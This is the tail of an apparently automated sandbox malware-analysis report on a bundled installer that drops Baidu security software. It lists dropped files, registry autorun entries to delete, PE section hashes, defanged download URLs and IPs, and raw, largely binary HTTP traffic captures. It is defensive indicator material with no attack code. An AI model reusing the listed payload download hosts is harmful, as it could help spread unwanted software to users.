%Program Files%\baidu\is-39O9G.tmp (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-CCSRF.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\baidu\unins000.dat (932 bytes)
%Program Files%\baidu\is-RG24O.tmp (25913 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\baidu\baidu.lnk (479 bytes)
%Program Files%\baidu\BindEx.ini (65 bytes)
%Documents and Settings%\All Users\Desktop\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«-ÃƒÂ¨Ã‚Â½Ã‚Â¯ÃƒÂ¤Ã‚Â»Ã‚Â¶ÃƒÂ§Ã‚Â®Ã‚Â¡ÃƒÂ§Ã‚ÂÃ¢â‚¬Â .lnk (866 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«-ÃƒÂ¨Ã‚Â½Ã‚Â¯ÃƒÂ¤Ã‚Â»Ã‚Â¶ÃƒÂ§Ã‚Â®Ã‚Â¡ÃƒÂ§Ã‚ÂÃ¢â‚¬Â .lnk (878 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\SWManager\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«-ÃƒÂ¨Ã‚Â½Ã‚Â¯ÃƒÂ¤Ã‚Â»Ã‚Â¶ÃƒÂ§Ã‚Â®Ã‚Â¡ÃƒÂ§Ã‚ÂÃ¢â‚¬Â .lnk (882 bytes)
%System%\config\software (3256 bytes)
%System%\config\SOFTWARE.LOG (4483 bytes)
%System%\drivers\BDEnhanceBoost.sys (61 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\MANIFEST-000002 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\MANIFEST-000002 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\IsolationDB.db-journal (532 bytes)
%System%\drivers\BDMWrench.sys (1882 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db-journal (532 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db (145 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\MANIFEST-000002 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db-journal (512 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"baidu" = "%Program Files%\baidu\BindEx.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BaiduAnTray" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BaiduAnTray.exe -stmd=3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"baidusdTray" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe -stmd=3"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	152808	153088	4.64164	22ced87f8cfbeec19f10ea768b9f5033
.rdata	159744	20275	20480	3.68225	9aea8072fe8459f1fb075382c5799ef0
.data	180224	136672	5120	1.76573	5aafebbc10957e661762e0e7fadc057b
.rsrc	319488	352972	353280	2.60045	ebe1342043d9699ab4effe84ccb7c5c0

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://ru.cpabaidu.com/baidu/test.txt	185.8.106.167
hxxp://ru.cpabaidu.com/baidu/F1023_s_30803.exe	185.8.106.167
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://e6845.ce.akamaiedge.net/pca3.crl
hxxp://e6845.ce.akamaiedge.net/pca3-g5.crl
hxxp://e6845.ce.akamaiedge.net/CSC3-2010.crl
hxxp://swsd.n.shifen.com/
hxxp://ru.cpabaidu.com/baidu/G1023_s_70904.exe	185.8.106.167
hxxp://sxsw.n.shifen.com/
hxxp://baidubrs.dlmix.glb0.lxdns.com/client1/common/patch/24946961047/dnw.xml
hxxp://baidubrs.dlmix.glb0.lxdns.com/client1/common/patch/34282863525/BDMWrench.sys
hxxp://baidubrs.dlmix.glb0.lxdns.com/client1/common/patch/32175066779/putips_wording.dat
hxxp://baidubrs.dlmix.glb0.lxdns.com/client1/common/patch/33137149111/hipsClient.xml
hxxp://s.x.baidu.com/	180.76.2.46
hxxp://d.x.baidu.com/	123.125.115.130
hxxp://dl1sw.baidu.com/client1/common/patch/24946961047/dnw.xml	8.37.235.11
hxxp://csc3-2010-crl.verisign.com/CSC3-2010.crl	23.9.117.163
hxxp://crl.verisign.com/pca3.crl	23.9.117.163
hxxp://dl1sw.baidu.com/client1/common/patch/33137149111/hipsClient.xml	8.37.235.11
hxxp://dl1sw.baidu.com/client1/common/patch/32175066779/putips_wording.dat	8.37.235.11
hxxp://dl1sw.baidu.com/client1/common/patch/34282863525/BDMWrench.sys	8.37.235.11
hxxp://crl.verisign.com/pca3-g5.crl	23.9.117.163
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab	23.15.4.9
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt	23.15.4.9
jp.download.iyuntian.com	123.125.65.154
tk.download.iyuntian.com	123.125.69.209
rc.download.iyuntian.com	123.125.65.153
up.download.iyuntian.com	123.125.65.148
res.download.iyuntian.com	123.125.65.129
dtrp.download.iyuntian.com	123.125.65.150
utk.download.iyuntian.com	123.125.65.147
cfg.download.iyuntian.com	123.125.65.132

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /client1/common/patch/33137149111/hipsClient.xml HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 200 OK

Expires: Sun, 09 Nov 2014 10:45:47 GMT

Date: Fri, 10 Oct 2014 10:45:47 GMT

Server: nginx

Content-Type: text/xml

Content-Length: 18710

Last-Modified: Fri, 10 Oct 2014 10:32:29 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Age: 2316160

Via: 1.0 sxycwt26:8104 (Cdn Cache Server V2.0), 1.0 jg14:5706 (Cdn Cache Server V2.0)

Connection: close

Content-Disposition: attachment;filename="hipsClient.xml"

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD

.......k..65.Mf.?../..m.x..`.D..#........x$....x=.B...$j......y}.....R.C[4x../../1........ .q..=../7L..R..if.%.....aa.....y.c.oO...T.K.......>F..:. ..h. .>..l....vYe.X.u.C:...yQ.....6..Gr./....r. b.....W$.8.R...7....1.......$.....PYf.E..!..p...0P.-..{..|!.j....G...K...............0.........%.b.a.2*.'...~.r..!*2..I...mv..b.-..z&....v...B.q.~h.^r.....r..x.D(.3s.zI...G...........L.y.^.....|.D9[.W,....\..T.x.....[...C... ..$yKI.Q.LG..fG....".{...fP..S1...Mz).]Ln.....2v...d...seab..v.......u...`*.....#...^@..G..Sb.dL5.8nhd.l.\.y...`.w.......3.u........A....kq~.k....}-.| .......^...Z.})..Fq./.....U.)..:..8.j.q.*.e.#..-1..Je...(....{..s.`se....Q.x......n..>......o4.>.3.xRO..X.~>..C`.`.....f...o.h.),N.ad.#.-.......1.........(.S..[.....)..z....w.....G.#..(..=.]..p.E....Q....H...7........!....h?......_...1../X.....(.v......h..o..b......p.QH..-..*..M.}...c.1h..}..k.ro6\...7..4.Za.....m........>2.E...Q.....%A.b..:.....$..p.c.W....U.m...JL..f.i!.<..H.....n.)../..2.?6.B.|j.IX'.bY.?1.........}...Cc....s].h........KY.... .....2.l.#..........Vq. ........5...O;..A.Z..........7..:$..s..|...[.u...&O.kq.....U.P@.....P.......6.....MR...>0.....o#..>....c....Os.<!.a.=.O......i.n.2GR-_prM..q..@.@.........>...Bl....&.5w..P.d9..N....S...5..r....d@......(...-g,/..Z6...o}&}'.D......,...Cj..1..'...#j..[...,..*.@o.........L......w....uw/[1....~..'^....h.......O^.?...m.......\...[.?bZrl.I.X7E.......1E... .....&S.. .#.S&\g.0.49.....r.Z...~.0.K.....R,.4.d.6cG...#9.......E..._.<.@.)V0.:.........B..B.Z.-".1o.T.

<<< skipped >>>

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 158

Content-Type: application/octet-stream

Host: s.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......VH>x.yw}Y.p~t....E..;.).

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 198

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...@......H`...[....V.Y..!c...A...<.....T.....Gl~.].......W3..4A._[D....

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 166

Content-Type: application/octet-stream

Host: s.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28..j:...i.t..A.c. 8.U......v.6.#.....A..G...d...*\.<.8.@.H.P.X...` ... ..D)..-...uT.h

.).:va:Y......H...

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 182

...z........" b58974f666e28edaba3814768157053d(.........28..j:.....i.t..A.c. 8.U......v.6..#.....A..G...d...*\.<..8.@.H.P.X...` ...0...x....U..2....$.5...'....2]..U......g'..Y..9.^. HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 182.....z........" b58974f666e28edaba3814768157053d(.........28..j:.....i.t..A.c. 8.U......v.6..#.....A..G...d...*\.<..8.@.H.P.X...` ...0...x....U..2....$.5...'....2]..U......g'..Y..9.^. ..

GET /pca3.crl HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: crl.verisign.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Server: Apache

ETag: "8f6b3bcd9bb64555001fba64f5b01b92:1411517716"

Last-Modified: Wed, 24 Sep 2014 00:15:16 GMT

Date: Thu, 06 Nov 2014 06:07:34 GMT

Content-Length: 933

Connection: keep-alive

Content-Type: application/pkix-crl

0...0...0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc.1705..U....Class 3 Public Primary Certification Authority..140922000000Z..141231235959Z0..x0!...v....a_>..2......020924164823Z0!.....A.....{2..Y.#..140129175709Z0!...,.|.|...<...j ...080605174907Z0!...`y..q.......fh...020923171400Z0!...?A....a.nF`.P....020923171548Z0!............R.e.53..010207212458Z0!..!......Y...ISi....010706171411Z0!..$-..I{r....u<._...080403172226Z0!..&.."?..y..51}..1..010706172118Z0!..4....2....{W......080605175030Z0!..B....c............070411175910Z0!..H.Py...N....* ....010207212031Z0!..N....-.1Gq.@...C..040401175251Z0!..Y......w`G........070411175657Z0!..Z`..H.@B....Z.*q..080403172017Z0!..l....I...Y..] .c..010706171749Z0"......T=deQ...1u.]...010207212247Z0".....p..1..7<.....e..010207211822Z0...*.H............M....s#..Lo...TU...tM.3...'.U......:Z...w.x.=....K.0;...!....D....9...,!....B.t. <..........-.....k.$<i{O.<.E...*.......Ow _..J.....

GET /pca3-g5.crl HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: crl.verisign.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Server: Apache

ETag: "bd6753109994fa1bef1833b34f3e263b:1411514416"

Last-Modified: Tue, 23 Sep 2014 23:20:16 GMT

Date: Thu, 06 Nov 2014 06:07:34 GMT

Content-Length: 533

Connection: keep-alive

Content-Type: application/pkix-crl

0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Public Primary Certification Authority - G5..140922000000Z..141231235959Z0...*.H.............O...i.i(.#..s.T....F....${|...xLT.k...(....AC.#.....Y.Ht..}.n..* ...b.Gs...G..N.|2*.9l....\..H.Y....Wh. .....A.......?/...}.......z.Q..qP_.-..~......!.UBW...ER..6....:.p...[...../..h...9.J(..<.;i.......?c.I.t....LV.uD....B..z...~I .6..aR[..(..q............HTTP/1.1 200 OK..Server: Apache..ETag: "bd6753109994fa1bef1833b34f3e263b:1411514416"..Last-Modified: Tue, 23 Sep 2014 23:20:16 GMT..Date: Thu, 06 Nov 2014 06:07:34 GMT..Content-Length: 533..Connection: keep-alive..Content-Type: application/pkix-crl..0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Public Primary Certification Authority - G5..140922000000Z..141231235959Z0...*.H.............O...i.i(.#..s.T....F....${|...xLT.k...(....AC.#.....Y.Ht..}.n..* ...b.Gs...G..N.|2*.9l....\..H.Y....Wh. .....A.......?/...}.......z.Q..qP_.-..~......!.UBW...ER..6....:.p...[...../..h...9.J(..<.;i.......?c.I.t....LV.uD....B..z...~I .6..aR[..(..q..............

<<< skipped >>>

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 166

Content-Type: application/octet-stream

Host: s.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28|PcJ.2.H.0.v[.o.'...aG.s.2....@....%.F..M...t..........8.@.H.P.X...` ... ..D)..-....9._e..BBw......ar.m...

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 2486

...z........" b58974f666e28edaba3814768157053d(.........28|PcJ.2.H.0.v[.o.'...aG.s.2....@....%.F..M....t..........8.@.H.P.X...` ...0..{.....Aj...!P@4...LQ`..._..(.H.....R.........<..z<./M........~..J..I....R....h. Fk.....R...~!L:...s.>.V@ 9 ..N.0...m...xH.E.................)T5..t&FF..5....oM......}}.;.$1.n.......).^..(.E.p...........s.e...p .Kq.!..E....C.' D.3'/_...;.'o{......<.*.I....}q..@Pn..;.(m7......B..D....@....V.B>.....R6.\..(.u..`....../,7.* ...Z......q..!...*C.O........L..b"......f.2.....a.y...\..1..ecG...X..^.........2SB...6...."...NA...T.K\....v....n0.....[.(.-.w....&!x.a-../K.WC@.tG"w..J..e....P...M......4.X......n9..N]#..uL...Y..}.......y........#....cn...0..p\ .I4..v.....s......h.;..*g......."..OQpC....&....&...... X....PkzS.@.....G.J...$...sU[q.`..]..p..bkB..S..S)...... .ez.h.7.&.E......=.l/.^...>X..f..~.Y.qr........kq...y[_.Q...6.5...qcn......c.....}.NS)....2'....\#..5......6..`n..%_".......o.-1..Z.4../V.0...E<.@...].J..M1...H..*|.....CW;.9E]..|h...n...#.....E.y.,.x....Ot..*...S#..-.C..0......q4..f........W.2...<..2.#8.....*^=......c.....9,).D..?.t.bl.'.V..l..V...cg%w..e......K........P...&...n..Bn|..q..F......7t..q...lq.... ?.NmS...{.\f...X......&..4.G..2...>....ux0W....[f .N..#...k&..o.]M./.......,....a.v..I.......zG.>a|..F.M..e..1.......i.....j..............i..f.HBx...l.EL.,\.W....._...Gw.........t.*1{!........;..z......o........?G.-{.q....h...mA...'K_d.yHA .....eY....-..[.....H..5_...%.#...........&..'...z...>d.{.<}. ~..-6f%:.....90x.....U......3.O....|..[

<<< skipped >>>

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 166

Content-Type: application/octet-stream

Host: s.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ... ..f#.g..})..U\.........).)3.T..4.

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 302

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ............".k.<(h[.Vwk.R.....i..g{.! .".U-h.0....s..$..f...:.w........1JE.?.n..........N..m...q...{. ..2..FWe...........}.5.Lc...8.....3bl.]..P........Dil4.. ../..P.[....%.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 302.....z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ............".k.<(h[.Vwk.R.....i..g{.! .".U-h.0....s..$..f...:.w........1JE.?.n..........N..m...q...{. ..2..FWe...........}.5.Lc...8.....3bl.]..P........Dil4.. ../..P.[....%...

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 78

Content-Type: application/octet-stream

Host: s.x.baidu.com

Keep-Alive: timeout=600,max=1000

...B........" b58974f666e28edaba3814768157053d(.........2.8.@.H.P.X...` ......

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 134

...z........" b58974f666e28edaba3814768157053d(.........28..j:.....i.t..A.c. 8.U......v.6..#.....A..G...d...*\.<..8.@.H.P.X...` ........

GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: VVV.download.windowsupdate.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Fri, 12 Sep 2014 18:02:51 GMT

Accept-Ranges: bytes

ETag: "80179bc4b3cecf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 18

Cache-Control: max-age=3635

Date: Thu, 06 Nov 2014 06:07:33 GMT

Connection: keep-alive

X-CCC: CA

X-CID: 2

1401CFCEB3C4C42958....

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: VVV.download.windowsupdate.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Fri, 12 Sep 2014 18:47:05 GMT

Accept-Ranges: bytes

ETag: "805a83f2b9cecf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 56928

Cache-Control: max-age=7567

Date: Thu, 06 Nov 2014 06:07:33 GMT

Connection: keep-alive

X-CCC: CA

X-CID: 2

MSCF....`.......,...................I.................,E.Y .authroot.stl..Y-..8..CK...<T...g.v!M.d..f.%d..}K..5..F. ...T..%.,YJ.,!T......_..x.<=O.....yy....;3..>.|..~..\.....|......;..8..~.za...."A...q.......g..m......<X........j"I........!..-w.....w....P...H..(.?}..2.N. .u..a. ...=.C..D.F>rC.. ..|).=.. ..3b.8H.M...(...u8.%...W.g...\YB.m:.....dE.........V....$....Dn:....0...S."...o..q.....K...I..K...(x%....>A.R...`.0 .........<`L0mp...%....y.....g.n...R0Op..<..,....`0$z.@..&.x"....T..H...<........~..E..".....<<.\B(.....................@.....L.........KNAy8/"...f.......k..Jm7j....R.5q....Rz..!@...].......Y.[........4.. .D8..&...t.J^O..Q.._..1.J.m5<'k.,....%T....i.\.;.;q..S./ 8.?Bu.............}D.Q....L....*..[.."e......15m..._.0.M........#..v!..<...@..?sc.y....*.....tX[........{.W4.Q...^u@..*..QP.......~.L9N....2r...4.....B..-\(...b.d...K...O.8..Un.......V.<.......A...V.....(..s..f..q.{N0.hS.,..;M.|G|.@.M.._.....7._6...C.0...A;L....%...M=Y.....f.JV.(.5.....0..?*...KZ....jM...8.6U...#...ew.?..?...........WE.Or..O>..{.'W2.........3m.O.u..Z8....H4@.w}.o:?~....]<!...%....}@.d...L.p.a.g ..K."..N1!%..S.bT.H.-.....e..`.0$...0t..DX..{.....#./...8.5..M...T.......D......V\C.zy.....3E:..>.{..).QW......q....9..n..1....8%,.........r.p@.>. ...Q.?.p..7.?..7...&..!.........`. .=....Sf..q.l.A.....L...t.}g..;...f....=.e.~.z....C..*R....H-..=...f..(t'.."....F...g._....n.J..U.4vr`}.....1..o@.....@.#...R. L8....z..].|......3..y..-./....K..6{...s.<R`.}6....?.......-..@.g..S....

<<< skipped >>>

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 166

Content-Type: application/octet-stream

Host: s.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ... ...f...f.i#O.ron...7?..";...>..;..

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 286

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...... %@......).u....Z.(L]~........]......L..w... ......BTl.Tf..<...X.wg..r.i.>..Y.8...1J.A..1..TP=S$./.=k..9...c..~5.)...;.........6..z._.0.GV..[.X..f...|.*HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 286.....z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...... %@......).u....Z.(L]~........]......L..w... ......BTl.Tf..<...X.wg..r.i.>..Y.8...1J.A..1..TP=S$./.=k..9...c..~5.)...;.........6..z._.0.GV..[.X..f...|.*..

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 182

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...0.L;P.....~.=....oX.....X5H..5.C^...v...TPJ...Jv..POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 190

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...8.L.4.CZ?.i/Q)....|.....f....K...C....l/K..?.a...JCzY.U.&.IPOST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 174

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...(..Q.b.g.[a.a.9.........y6..%.d..O.V..?..?qPOST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 174

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...(....S...R.H..H...&...!....8.?.T.b.../\. W.

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 150

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` .....Ln..o".<a...K..:.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` .....Ln..o".<a...K..:.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` .......;D...J.X..~....HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` .....L....u..)M-0....@HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......t..L?l#...J?...GHTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053

<<< skipped >>>

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 350

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` .......P.m]p..f!R...4H.o...i..E..|.X.:......s`B.........m..8..cX..$G5...2...u.....[#z"......uz^........%Y.vv........d.....|.u.U~.`....5|!.....<w....D/........h.......B}......[Q.p?@.....bZt........4.b.IsoM.Q....|.p j...

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 150

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...........">.r0#X....HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...........">.r0#X........

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 190

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...8... ..3.}_.Ef=/......4..*20h......1.k.ubE....I..P........3POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 190

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z......

" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...8.......=P.U..|.n...k....n....jE..........d}z.....".z}..8.POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 190

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...8..z....5L)b?D\...R.| .~.n....h......{....~X(...3.L....KiPOST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 190

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z......." b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...8...I.,[_...*..'..i(......g}..>>......a......y.]`..{.sV#R.k

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 150

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......z...9(&.e6... ......

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 190

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z......." b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...8........#9.H..G...."...EvM=??F......o.B.`.....u..o)L....gy

HTTP/1.1 200 OK

Server: iYuntianSvr
